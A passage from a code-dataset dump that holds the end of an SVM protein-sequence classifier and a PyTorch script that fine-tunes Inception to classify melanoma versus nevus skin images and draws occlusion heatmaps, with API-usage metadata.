(first 50 N-terminal residues)']), combination[0], aa_order)\n test_set_vect, train_set_vect = create_binary_vect(test_set), create_binary_vect(train_set) #test_set_vect_y contains the real class of each entry\n svc = create_svc_model(train_set_matrix, train_set_vect, combination[1], combination[2]) #training the svc with the training set\n test_set_pred = svc.predict(test_set_matrix) #testing the svc on the testing set\n accuracy, f_score, single_mcc, precision, recall = get_metrics(test_set_vect, test_set_pred)\n accuracies.append(accuracy), f_scores.append(f_score), fold_mccs.append(single_mcc), precisions.append(precision), recalls.append(recall)\n accuracy_se, fscore_se, fold_mcc_se, precision_se, recall_se = get_se(accuracies, num_class), get_se(f_scores, num_class), get_se(fold_mccs, num_class), get_se(precisions, num_class), get_se(recalls, num_class)\n testing_conf_matrix = confusion_matrix(test_set_vect, test_set_pred)\n tn, fp, fn, tp = confusion_matrix(test_set_vect, test_set_pred).ravel()\n #print('Testing set', num_fold, 'confusion matrix:', '\\n', testing_conf_matrix)\n #print('TN:', tn, 'FP:', fp, 'FN:', fn, 'TP:', tp)\n mccs.append(mean(fold_mccs)) #computing the avg between the 5 possible MCC for each combination\n mccs_se = get_se(mccs, num_class)\n max_mcc, max_index, opt_combination = find_opt_combination(mccs, combinations) #finding the best combination between the 27 possible ones (the one with the highest MCC)\n print('27 combinations MCC:', mccs)\n print('Maximum MCC:', max_mcc, '| Approximation: %.2f' %max_mcc)\n print('Associated index of the maximum MCC:', max_index)\n print('Optimal k-C-gamma combination:', opt_combination)\n print('Average accuracy:', mean(accuracies), '| Approximation: %.2f' %mean(accuracies))\n print('Average F-score:', mean(f_scores), '| Approximation: %.2f' %mean(f_scores))\n print('Average precision:', mean(precisions), '| Approximation: %.2f' %mean(precisions))\n print('Average recalls:', mean(recalls), '| Approximation: %.2f' %mean(recalls))\n print()\n print('Accuracy standard error:', accuracy_se, '| Approximation: %.2f' %accuracy_se)\n print('F1 score standard error:', fscore_se, '| Approximation: %.2f' %fscore_se)\n print('MCC standard error:', mccs_se, '| Approximation: %.2f' %mccs_se)\n print('Precision standard error:', precision_se, '| Approximation: %.2f' %precision_se)\n print('Recall standard error:', recall_se, '| Approximation: %.2f' %recall_se)\n print()\n\n train_matrix, bench_matrix = create_matrix_x(list(train_df['Sequence (first 50 N-terminal residues)']), opt_combination[0], aa_order), create_matrix_x(list(bench_df['Sequence (first 50 N-terminal residues)']), opt_combination[0], aa_order)\n train_vect, bench_vect = create_binary_vect(train_df), create_binary_vect(bench_df)\n svc = svm.SVC(C=opt_combination[1], kernel='rbf', gamma=opt_combination[2])\n svc.fit(train_matrix, train_vect)\n bench_pred = svc.predict(bench_matrix)\n bench_conf_matrix = confusion_matrix(bench_vect, bench_pred) \n tn, fp, fn, tp = confusion_matrix(bench_vect, bench_pred).ravel()\n accuracy, f_score, mcc, precision, recall = get_metrics(bench_vect, bench_pred)\n print('Accuracy:', accuracy, '| Approximation: %.2f' %accuracy)\n print('F-score:', f_score, '| Approximation: %.2f' %f_score)\n print('MCC:', mcc, '| Approximation: %.2f' %mcc)\n print('Precision:', precision, '| Approximation: %.2f' %precision)\n print('Recall:', recall, '| Approximation: %.2f' %recall)\n print('Benchmark Set confusion matrix:', '\\n', bench_conf_matrix)\n print('TN:', tn, 'FP:', fp, 'FN:', fn, 'TP:', tp)\n print(get_classification(bench_df, bench_vect, bench_pred))\n\n", "repo_name": "violavuong/bioinfo", "sub_path": "lb2/svm.py", "file_name": "svm.py", "file_ext": "py", "file_size_in_byte": 9120, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.argv", "line_number": 88, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 89, "usage_type": "attribute"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 110, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 111, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 114, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 121, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 122, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 123, "usage_type": "call"}, {"api_name": "statistics.mean", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 135, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 135, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 138, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "4496578688", "text": "from __future__ import division\nfrom __future__ import print_function\nimport copy\nimport math\nimport os\nimport pickle\nimport random\nimport time\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom PIL import Image\nfrom PIL import ImageFile\nfrom torch.autograd import Variable\nfrom torchvision import datasets, models, transforms\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\nnorm_mean = [0.485, 0.456, 0.406]\nnorm_std = [0.229, 0.224, 0.225]\n\n\ndef get_norm():\n return norm_mean, norm_std\n\n\nDATA = '/data/isic/analysed/'\nINVALID_CACHE = False\n# Detect if we have a GPU available\nis_cuda = torch.cuda.is_available()\nassert is_cuda\ndevice = torch.device(\"cuda:1\")\n\n\ndef np_to_tensor(X, type=torch.FloatTensor, requires_grad=False):\n v = Variable(torch.from_numpy(X), requires_grad=requires_grad).type(type)\n if is_cuda: v = v.cuda()\n return v\n\n\ndef cache_run(f, cache_file=None, cache=True, args=None):\n \"\"\"\n Wrap another function cache the return value\n Probably better to use np.save for large np arrays\n \"\"\"\n argstring = None\n # if args is not None:\n # argstring = '.'.join([str(k)+'.'+str(v) for k,v in args.items()])\n if cache_file is None:\n cache_file = f.__name__\n if argstring is not None: cache_file += '.' + argstring\n cache_file += '.pkl'\n\n v = None\n cache_file = DATA + cache_file\n if (not INVALID_CACHE) and cache and os.path.exists(cache_file):\n # print('loading cache...',cache_file)\n v = pickle.load(open(cache_file, 'rb'))\n else:\n print('cache_run calculating...')\n if args is not None:\n v = f(args)\n else:\n v = f()\n\n pickle.dump(v, open(cache_file, 'wb'))\n\n assert len(v) > 0\n return v\n\n\n# https://pytorch.org/tutorials/beginner/finetuning_torchvision_models_tutorial.html\n\nBASE = './isic/'\ndata_dir = BASE + 'dataset-classify'\n# model_dir = '/data/isic/analysed/classify/' # to train with magnus model\nmodel_dir = BASE + 'analysed/classify/' # to train with CA retrained jitter\n# Models to choose from [resnet, alexnet, vgg, squeezenet, densenet, inception]\nnum_classes = 2\nbatch_size = 8\nnum_epochs = 30 # was 15\nmodel_name = 'inception' # CA\n# model_name = 'vgg'\n# Flag for feature extracting. When False, we finetune the whole model,\n# when True we only update the reshaped layer params\nfeature_extract = False\n\n\ndef create_image_folder():\n import os, json\n from shutil import copyfile\n classes = ['melanoma', 'nevus']\n files = {c: [] for c in classes}\n\n in_desc = BASE + 'descriptions/'\n in_img = BASE + 'images/'\n out_dir = BASE + 'dataset-classify/'\n train_frac = 0.8\n\n for filename in os.listdir(in_desc):\n if filename[0] == '.': continue\n data = json.load(open(in_desc + filename))\n if 'diagnosis' in data['meta']['clinical']:\n diag = data['meta']['clinical']['diagnosis']\n else:\n diag = None\n src = in_img + filename + '.jpeg'\n if diag in classes and os.path.exists(src):\n files[diag].append(filename)\n\n for c in classes:\n random.shuffle(files[c])\n n_train = int(train_frac * float(len(files[c])))\n\n for phase in ['train', 'val']:\n if not os.path.exists(out_dir + phase): os.mkdir(out_dir + phase)\n if not os.path.exists(out_dir + phase + '/' + c): os.mkdir(out_dir + phase + '/' + c)\n\n if phase == 'train':\n v = files[c][:n_train]\n elif phase == 'val':\n v = files[c][n_train:]\n\n for filename in v:\n print(filename, c, phase)\n dest = out_dir + phase + '/' + c + '/' + filename + '.jpeg'\n if not os.path.exists(dest):\n copyfile(in_img + filename + '.jpeg', dest)\n\n\ndef set_parameter_requires_grad(model, feature_extracting):\n if feature_extracting:\n for param in model.parameters():\n param.requires_grad = False\n\n\ndef initialize_model(model_name, num_classes, feature_extract, use_pretrained=True, load=False):\n # Initialize these variables which will be set in this if statement. Each of th\n # variables is model specific.\n model_ft = None\n input_size = 0\n assert not feature_extract\n if load: use_pretrained = False\n\n if model_name == \"resnet\":\n \"\"\" Resnet18\n \"\"\"\n assert False\n model_ft = models.resnet18(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n input_size = 224\n\n elif model_name == \"alexnet\":\n \"\"\" Alexnet\n \"\"\"\n assert False\n model_ft = models.alexnet(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n input_size = 224\n\n elif model_name == \"vgg\":\n \"\"\" VGG11_bn\n \"\"\"\n # model_ft = models.vgg11_bn(pretrained=use_pretrained)\n model_ft = models.vgg19(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier[6].in_features\n model_ft.classifier[6] = nn.Linear(num_ftrs, num_classes)\n input_size = 224\n\n elif model_name == \"squeezenet\":\n \"\"\" Squeezenet\n \"\"\"\n assert False\n model_ft = models.squeezenet1_0(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft, feature_extract)\n model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1, 1), stride=(1, 1))\n model_ft.num_classes = num_classes\n input_size = 224\n\n elif model_name == \"densenet\":\n \"\"\" Densenet\n \"\"\"\n assert False\n model_ft = models.densenet121(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft, feature_extract)\n num_ftrs = model_ft.classifier.in_features\n model_ft.classifier = nn.Linear(num_ftrs, num_classes)\n input_size = 224\n\n elif model_name == \"inception\":\n \"\"\" Inception v3\n Be careful, expects (299,299) sized images and has auxiliary output\n \"\"\"\n model_ft = models.inception_v3(pretrained=use_pretrained)\n set_parameter_requires_grad(model_ft, feature_extract)\n # Handle the auxilary net\n num_ftrs = model_ft.AuxLogits.fc.in_features\n model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)\n # Handle the primary net\n num_ftrs = model_ft.fc.in_features\n model_ft.fc = nn.Linear(num_ftrs, num_classes)\n input_size = 299\n\n else:\n print(\"Invalid model name, exiting...\")\n exit()\n\n if load:\n filename = model_dir + model_name + '.pth'\n assert os.path.exists(filename)\n print('loading model', filename)\n model_ft.load_state_dict(torch.load(filename))\n\n return model_ft, input_size\n\n\ndef train_model(model, dataloaders, criterion, optimizer, num_epochs=25, is_inception=False):\n since = time.time()\n\n val_acc_history = []\n\n best_model_wts = copy.deepcopy(model.state_dict())\n best_acc = 0.0\n i = 0\n\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'val']:\n if phase == 'train':\n model.train() # Set model to training mode\n else:\n model.eval() # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n\n # Iterate over data.\n for inputs, labels in dataloaders[phase]:\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n # track history if only in train\n with torch.set_grad_enabled(phase == 'train'):\n # Get model outputs and calculate loss\n # Special case for inception because in training it has an auxiliary output. In train\n # mode we calculate the loss by summing the final output and the auxiliary output\n # but in testing we only consider the final output.\n if is_inception and phase == 'train':\n # From https://discuss.pytorch.org/t/how-to-optimize-inception-model-with-auxiliary-classifiers/7958\n outputs, aux_outputs = model(inputs)\n loss1 = criterion(outputs, labels)\n loss2 = criterion(aux_outputs, labels)\n loss = loss1 + 0.4 * loss2\n else:\n outputs = model(inputs)\n loss = criterion(outputs, labels)\n\n _, preds = torch.max(outputs, 1)\n\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n\n # statistics\n running_loss += loss.item() * inputs.size(0)\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / len(dataloaders[phase].dataset)\n epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)\n\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))\n\n # deep copy the model\n if phase == 'val' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n\n filename = model_dir + model_name + '.pth'\n print('saving', filename)\n torch.save(model.state_dict(), filename)\n\n if phase == 'val':\n val_acc_history.append(epoch_acc)\n\n print()\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))\n print('Best val Acc: {:4f}'.format(best_acc))\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n return model, val_acc_history\n\n\ndef create_dataloaders(input_size, batch_size=batch_size, only_val_transforms=False):\n data_transforms = {\n 'train': transforms.Compose([\n transforms.RandomResizedCrop(input_size),\n transforms.RandomHorizontalFlip(),\n transforms.RandomVerticalFlip(), # magnus added\n transforms.RandomRotation(180), # magnus added\n transforms.ColorJitter(hue=0.4), # callum added for the second round of training with hue changes\n transforms.ToTensor(),\n # transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n transforms.Normalize(norm_mean, norm_std)\n ]),\n 'val': transforms.Compose([\n transforms.Resize(input_size),\n transforms.CenterCrop(input_size),\n transforms.ToTensor(),\n # transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n transforms.Normalize(norm_mean, norm_std)\n ]),\n }\n if only_val_transforms: data_transforms['train'] = data_transforms['val']\n\n # Create training and validation datasets\n # image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']}\n image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']}\n # Create training and validation dataloaders\n dataloaders_dict = {\n x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle=True, num_workers=4) for x in\n ['train', 'val']}\n return dataloaders_dict\n\n\ndef run_training(load=True, save=True):\n # Initialize the model for this run\n model_ft, input_size = initialize_model(model_name, num_classes, feature_extract, use_pretrained=True, load=load)\n\n # Data augmentation and normalization for training # Just normalization for valid ation\n\n # Create training and validation datasets\n # image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'val']}\n # Create training and validation dataloaders\n # dataloaders_dict = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size= batch_size, shuffle=True, num_workers=4) for x in ['train', 'val']}\n dataloaders_dict = create_dataloaders(input_size)\n\n # to fine label-> index: image_datasets['train'].class_to_idx\n # 0=melanoma, 1= nevus\n\n # Send the model to GPU\n model_ft = model_ft.to(device)\n\n # Gather the parameters to be optimized/updated in this run. If we are\n # finetuning we will be updating all parameters. However, if we are\n # doing feature extract method, we will only update the parameters\n # that we have just initialized, i.e. the parameters with requires_grad\n # is True.\n params_to_update = model_ft.parameters()\n # print(\"Params to learn:\")\n if feature_extract:\n params_to_update = []\n for name, param in model_ft.named_parameters():\n if param.requires_grad:\n params_to_update.append(param)\n # print(\"\\t\",name)\n else:\n for name, param in model_ft.named_parameters():\n if param.requires_grad:\n pass\n # print(\"\\t\",name)\n\n # Observe that all parameters are being optimized\n optimizer_ft = optim.SGD(params_to_update, lr=0.001, momentum=0.9)\n\n # Setup the loss fxn\n criterion = nn.CrossEntropyLoss()\n\n # Train and evaluate\n model_ft, hist = train_model(model_ft, dataloaders_dict, criterion, optimizer_ft, num_epochs=num_epochs,\n is_inception=(model_name == \"inception\"))\n\n\n# ===============================================================================\n\n# def image_loader(image_name,input_size):\n# \"\"\"\n# Load image and apply normalization as required for feeding to network\n# \"\"\"\n# loader = transforms.Compose([\n#\ttransforms.Resize(input_size),\n#\ttransforms.CenterCrop(input_size),\n#\ttransforms.ToTensor(),\n#\ttransforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n#\t])\n# image = Image.open(image_name)\n# image = loader(image).float()\n# image = Variable(image, requires_grad=True)\n##image = image.unsqueeze(0) #this is for VGG, may not be needed for ResNet\n# return image.cuda() #assumes that you're using GPU\n#\n#\n# def display_image_loader(image_name,input_size):\n# \"\"\"\n# Load image and crop - to make figures, no other normalization\n# \"\"\"\n# loader = transforms.Compose([\n#\ttransforms.Resize(input_size),\n#\ttransforms.CenterCrop(input_size),\n#\t])\n# image = Image.open(image_name)\n# image = loader(image)\n# return image\n\ndef create_masks(img_size, mask_size, step):\n img_size = int(img_size)\n n_masks = int(math.ceil(img_size / step) ** 2)\n masks = np.ones((n_masks, 3, img_size, img_size))\n mask_dims = []\n\n i = 0\n for y1 in range(0, img_size, step):\n for x1 in range(0, img_size, step):\n x2 = min(x1 + mask_size, img_size)\n y2 = min(y1 + mask_size, img_size)\n # print(x1,y1,x2,y2)\n masks[i, :, x1:x2, y1:y2] = 0\n mask_dims.append((x1, x2, y1, y2))\n i += 1\n\n # a = Image.fromarray(masks[15,1,:,:]*255)\n # a.show()\n return masks, mask_dims\n\n\ndef analyse_model():\n \"\"\"\n Run the trained inception model on all of the validation images and save results\n \"\"\"\n import common\n out = open('/data/isic/analysed/inception_results.csv', 'w')\n model_ft, img_size = initialize_model('inception', num_classes=2, feature_extract=False, use_pretrained=False,\n load=True)\n model_ft.cuda()\n model_ft.eval()\n paths = [('/data/isic/dataset-classify/val/nevus/', 'nevus'),\n ('/data/isic/dataset-classify/val/melanoma/', 'melanoma')]\n\n correct = 0.0\n incorrect = 0.0\n\n for path in paths:\n for filename in os.listdir(path[0]):\n img = common.image_loader(path[0] + filename, img_size)\n img = img.repeat(1, 1, 1, 1)\n X = torch.softmax(model_ft(img), 1)\n X = X.detach().cpu().numpy()[0][0]\n if X >= 0.5 and path[1] == 'melanoma':\n correct += 1\n elif X < 0.5 and path[1] == 'nevus':\n correct += 1\n else:\n incorrect += 1\n v = [filename, path[1], X, correct / (correct + incorrect)]\n v = [str(a) for a in v]\n print(v)\n out.write(','.join(v) + '\\n')\n\n\ndef analyse_image_mask(model_ft, img_size, path, filename, modes=['heatmap', 'best']):\n \"\"\"\n Occlude areas of hte image using tiled masks and assess which are most important for classification\n Save the region that causes the most differentiation\n \"\"\"\n max_batch = 50\n # filename = '/data/isic/dataset-classify/val/melanoma/ISIC_0009934.jpeg'\n # filename = '/data/isic/dataset-classify/val/melanoma/ISIC_0000284.jpeg'\n # filename = '/data/isic/dataset-classify/val/melanoma/ISIC_0029740.jpeg'\n out_dir = '/data/isic/analysed/heatmap/'\n out_dir2 = '/data/isic/analysed/topdisc/'\n if not os.path.exists(out_dir): os.mkdir(out_dir)\n if not os.path.exists(out_dir2): os.mkdir(out_dir2)\n\n # model_ft, img_size = initialize_model('inception', num_classes=2, feature_extract=False, use_pretrained=False,load=True)\n # model_ft.cuda()\n # model_ft.eval()\n\n def f1():\n mask_size = int(img_size / 5)\n step = int(mask_size / 4)\n masks, mask_dims = create_masks(img_size, mask_size, step)\n masks = np_to_tensor(masks)\n n_masks = masks.shape[0]\n results = np.zeros(n_masks)\n\n for start in range(0, n_masks, max_batch):\n batch_size = min(max_batch, n_masks - start)\n current_masks = masks[start:start + batch_size, :, :, :]\n img = image_loader(path + filename, img_size)\n img = img.repeat(batch_size, 1, 1, 1)\n img = img * current_masks\n X = torch.softmax(model_ft(img), 1)\n X = X.detach().cpu().numpy()\n results[start:start + batch_size] = X[:, 1]\n # print(X.shape,current_masks.shape)\n\n return results, masks.cpu().numpy(), mask_dims\n\n results, masks, mask_dims = cache_run(f1, cache=False)\n img_size = masks.shape[2]\n #\n heat_map = np.zeros((img_size, img_size))\n total = np.zeros((img_size, img_size))\n\n for i, x in enumerate(results):\n inverse_mask = np.logical_not(masks[i, 0, :, :].copy())\n heat_map += x * inverse_mask\n total += inverse_mask\n\n input_img = display_image_loader(path + filename, img_size)\n input_array = np.asarray(input_img).copy()\n out_file = filename.split('.')[0]\n\n # save the top discrim region\n if 'best' in modes:\n best = np.argmax(results)\n x1, x2, y1, y2 = mask_dims[best]\n best_img = Image.fromarray(input_array[x1:x2, y1:y2])\n best_img.save(out_dir2 + out_file + '.jpg')\n\n # save the heatmap\n if 'heatmap' in modes:\n heat_map = heat_map / total\n # input_img = display_image_loader(path+filename,img_size)\n input_img.save(out_dir + out_file + '_img.jpg')\n import pylab as pl\n # input_img = np.asarray(input_img).copy()\n pl.pcolor(heat_map, cmap='jet')\n pl.axis('off')\n pl.gca().set_aspect('equal', adjustable='box')\n pl.savefig(out_dir + out_file + '_heatmap.jpg')\n\n\ndef all_analyse_image_mask():\n path = '/data/isic/dataset-classify/val/melanoma/'\n model_ft, img_size = initialize_model('inception', num_classes=2, feature_extract=False, use_pretrained=False,\n load=True)\n model_ft.cuda()\n model_ft.eval()\n\n for filename in os.listdir(path):\n if not filename.endswith('jpeg'): continue\n print(path, filename)\n analyse_image_mask(model_ft, img_size, path, filename, modes=['best'])\n\n\nif __name__ == \"__main__\":\n run_training()\n", "repo_name": "thelynchlab/adversarial", "sub_path": "classify.py", "file_name": "classify.py", "file_ext": "py", "file_size_in_byte": 20437, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PIL.ImageFile.LOAD_TRUNCATED_IMAGES", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PIL.ImageFile", "line_number": 18, "usage_type": "name"}, {"api_name": "torch.cuda.is_available", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.autograd.Variable", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 59, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 67, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 101, "usage_type": "call"}, {"api_name": "json.load", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "random.shuffle", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path", "line_number": 128, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 129, "usage_type": "call"}, {"api_name": "torchvision.models.resnet18", "line_number": 150, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 153, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 153, "usage_type": "name"}, {"api_name": "torchvision.models.alexnet", "line_number": 160, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 160, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torchvision.models.vgg19", "line_number": 170, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 170, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 173, "usage_type": "name"}, {"api_name": "torchvision.models.squeezenet1_0", "line_number": 180, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 180, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 182, "usage_type": "name"}, {"api_name": "torchvision.models.densenet121", "line_number": 190, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 190, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 193, "usage_type": "name"}, {"api_name": "torchvision.models.inception_v3", "line_number": 200, "usage_type": "call"}, {"api_name": "torchvision.models", "line_number": 200, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 204, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 204, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 207, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 218, "usage_type": "call"}, {"api_name": "time.time", "line_number": 224, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.set_grad_enabled", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 271, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 280, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 294, "usage_type": "call"}, {"api_name": "time.time", "line_number": 301, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 312, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 312, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 313, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 313, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomHorizontalFlip", "line_number": 314, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 314, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomVerticalFlip", "line_number": 315, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 315, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomRotation", "line_number": 316, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 316, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 317, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 317, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 318, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 318, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 320, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 320, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 322, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 322, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 323, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 323, "usage_type": "name"}, {"api_name": "torchvision.transforms.CenterCrop", "line_number": 324, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 324, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 325, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 325, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 327, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 327, "usage_type": "name"}, {"api_name": "torchvision.datasets.ImageFolder", "line_number": 334, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 334, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 334, "usage_type": "call"}, {"api_name": "os.path", "line_number": 334, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 337, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 337, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 380, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 380, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 383, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 383, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 423, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 424, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 459, "usage_type": "call"}, {"api_name": "common.image_loader", "line_number": 460, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 462, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 487, "usage_type": "call"}, {"api_name": "os.path", "line_number": 487, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 487, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 488, "usage_type": "call"}, {"api_name": "os.path", "line_number": 488, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 488, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 500, "usage_type": "call"}, {"api_name": "torch.softmax", "line_number": 508, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 518, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 519, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 522, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 532, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 534, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 534, "usage_type": "name"}, {"api_name": "pylab.pcolor", "line_number": 544, "usage_type": 